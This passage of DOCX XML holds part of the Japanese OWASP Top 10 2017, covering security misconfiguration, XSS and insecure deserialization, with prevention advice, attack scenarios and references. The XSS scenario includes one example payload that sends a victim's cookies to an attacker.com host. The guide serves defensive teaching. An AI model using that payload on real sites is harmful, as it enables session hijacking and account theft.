        <w:t xml:space="preserve">サーバがセキュリテイヘッダーやディレクティブを送らなかったり、安全な値に設定されていなかったりする。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ソフトウェアが古いか脆弱である (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>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bookmarkEnd w:id="187"/>
    <w:bookmarkStart w:id="188" w:name="防止方法-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">防止方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">安全にインストールするプロセスにおいて、以下のことを実施すべきです:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">レビューを実施して、セキュリティ関連の記録と更新の全てに加え、パッチを管理するプロセスの一環としてパッチの設定を適切に更新すること(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">セキュリティディレクティブをクライアントへ送ること。例えば</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId141">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">セキュリティヘッダー</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">プロセスを自動化して設定の有効性を検証し、環境すべてに適用すること。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="188"/>
    <w:bookmarkStart w:id="189" w:name="攻撃シナリオの例-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻撃シナリオの例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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ければ、攻撃者はデフォルトのパスワードを使ってログインし、乗っ取ってしまいます。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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Cs/>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Cs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">シナリオ #4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: クラウドサービスプロバイダは、他のCSPユーザによるデフォルトでインターネットに公開された共有パーミッションを用意しています。こうなると、機微な情報がクラウドストレージに保存され、アクセスされてしまいます。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="189"/>
    <w:bookmarkStart w:id="201" w:name="参考資料-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="193" w:name="owasp-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId190">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Configuration Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId191">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Testing for Error Codes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId141">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92">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">V19 Configuration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を参照してください。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="193"/>
    <w:bookmarkStart w:id="200" w:name="外部資料-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId194">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">NIST Guide to General Server Hardening</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId195">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-2: Environmental Security Flaws</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId196">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-16: Configuration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId197">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-388: Error Handling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId198">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CIS Security Configuration Guides/Benchmarks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId199">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Amazon S3 Bucket Discovery and Enumeration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="200"/>
    <w:bookmarkEnd w:id="201"/>
    <w:bookmarkEnd w:id="202"/>
    <w:bookmarkStart w:id="220" w:name="a72017-クロスサイトスクリプティング-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A7:2017-クロスサイトスクリプティング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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 3 : 検出のしやすさ 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 2 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>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tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSSの影響は、リフレクテッド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bookmarkStart w:id="203" w:name="脆弱性発見のポイント-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSSには3種類のタイプが存在し、大抵は被害者のブラウザがターゲットとされます:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">リフレクテッドXSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: アプリケーションまたはAPIが、ユーザ入力データを適切に検証およびエスケープせずに、HTML出力の一部として含めている。攻撃が成功すると、攻撃者は被害者のブラウザで任意のHTMLやJavaScriptを実行できる。一般的には、ユーザは、いわゆる水飲み場サイトや広告ページなど攻撃に乗っ取られたページに辿り着くための悪質なリンクを踏むことになる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ストアドXSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: アプリケーションまたはAPIがそのデータを無害化せずに格納する。それら入力データは、後に別のユーザまたは管理者によって閲覧されることになる。ストアドXSSは、大抵の場合、高または重大リスクとみなされる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DOMベースXSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: JavaScriptフレームワーク、シングルページアプリケーション、およびAPIが、攻撃者の制御可能なデータを動的に取り込んでページに出力することにより、DOMベースXSS脆弱性となる。理想を言えば、アプリケーションは安全でないJavaScript APIに対して攻撃者が制御可能なデータを送信してはいけない。</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bookmarkEnd w:id="203"/>
    <w:bookmarkStart w:id="207" w:name="防止方法-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">防止方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSSを防止するには、信頼できないデータを動的なブラウザコンテンツから区別する必要があります。以下を実施します:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ボディ、属性、JavaScript、CSSやURLなどHTML出力のコンテキストに基づいて、信頼出来ないHTTPリクエストデータをエスケープすることで、リフレクテッドおよびストアドXSS脆弱性を解消できる。要求されるデータの詳細なエスケープ手法は </w:t>
      </w:r>
      <w:hyperlink r:id="rId204">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet 'XSS Prevention'</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> を参照のこと。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">クライアント側でのブラウザドキュメント改変時に、コンテキスト依存のエンコーディングを適用することで、DOMベースXSSへの対策となる。これが行えない場合には、</w:t>
      </w:r>
      <w:hyperlink r:id="rId205">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet 'DOM based XSS Prevention'</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">で説明されている、同様のコンテキスト依存のエスケープ手法をブラウザAPIに適用することもできる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSSに対する多層防御措置の一環として </w:t>
      </w:r>
      <w:hyperlink r:id="rId206">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bookmarkEnd w:id="207"/>
    <w:bookmarkStart w:id="208" w:name="攻撃シナリオの例-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻撃シナリオの例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">攻撃者はブラウザでパラメータ‘CC’を以下に改変します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;document.location='https://attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie&lt;/script&gt;'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rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 攻撃者は、アプリケーションが使用している自動化されたCSRF対策を、XSSで破ることができます。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="208"/>
    <w:bookmarkStart w:id="219" w:name="参考資料-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="215" w:name="owasp-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId209">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Proactive Controls: Encode Data</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId209">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Proactive Controls: Validate Data</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Application Security Verification Standard: V5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId210">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Testing for Reflected XSS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId211">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Testing for Stored XSS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId212">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Testing for DOM XSS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId204">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: XSS Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId205">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: DOM based XSS Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId213">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: XSS Filter Evasion</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId214">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Java Encoder Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="215"/>
    <w:bookmarkStart w:id="218" w:name="外部資料-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId216">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-79: Improper neutralization of user supplied input</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId217">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger: Client-side template injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="218"/>
    <w:bookmarkEnd w:id="219"/>
    <w:bookmarkEnd w:id="220"/>
    <w:bookmarkStart w:id="235" w:name="a82017-安全でないデシリアライゼーション"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A8:2017-安全でないデシリアライゼーション</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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 2 : 攻撃検知のしやすさ 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 3 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">この問題は、OWASPが行った</w:t>
            </w:r>
            <w:hyperlink r:id="rId221">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デシリアライゼーション問題の検知と対応に役立つツールが整備されるにつれ、この欠陥が流行するのではないかと考えられます。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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bookmarkStart w:id="222" w:name="脆弱性発見のポイント-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">リモート間またはローカル内でのプロセス間通信（RPCやIPC）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ワイヤプロトコル、Webサービス、メッセージブローカー</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">キャッシュ/永続化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">データベース、キャッシュサーバ、ファイルシステム</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTPクッキー、HTMLフォームのパラメータ、API認証トークン</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="222"/>
    <w:bookmarkStart w:id="223" w:name="防止方法-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">悪意のあるオブジェクトの生成やデータの改ざんを防ぐために、シリアライズされたオブジェクトにデジタル署名などの整合性チェックを実装する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">可能であればデシリアライズに関するコードは分離して、低い権限の環境下で実行する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">型の不整合やデシリアライズ時に生じた例外など、デシリアライゼーションで発生した失敗や例外はログに記録する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">デシリアライズするコンテナやサーバからの、送受信に関するネットワーク接続は、制限もしくはモニタリングする。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">特定のユーザが絶えずデシリアライズしていないか、デシリアライゼーションをモニタリングし、警告する。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="223"/>
    <w:bookmarkStart w:id="224" w:name="攻撃シナリオの例-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻撃シナリオの例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">シナリオ #1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Reactアプリケーションが、一連のSpring Bootマイクロサービスを呼び出します。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">関数型言語のプログラマーは、イミュータブルなコードを書こうとします。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">そこで、プログラマーは、呼び出しの前後でシリアライズしたユーザーの状態を渡す、と言う解決策を思いつきます。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">攻撃者は （base64でエンコードされていることを示す）"rO0(小文字アール・大文字オー・ゼロ)"というJavaオブジェクトのシグネチャに気づき、Java Serial Killerツールを使用してアプリケーションサーバ上でリモートコードを実行します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
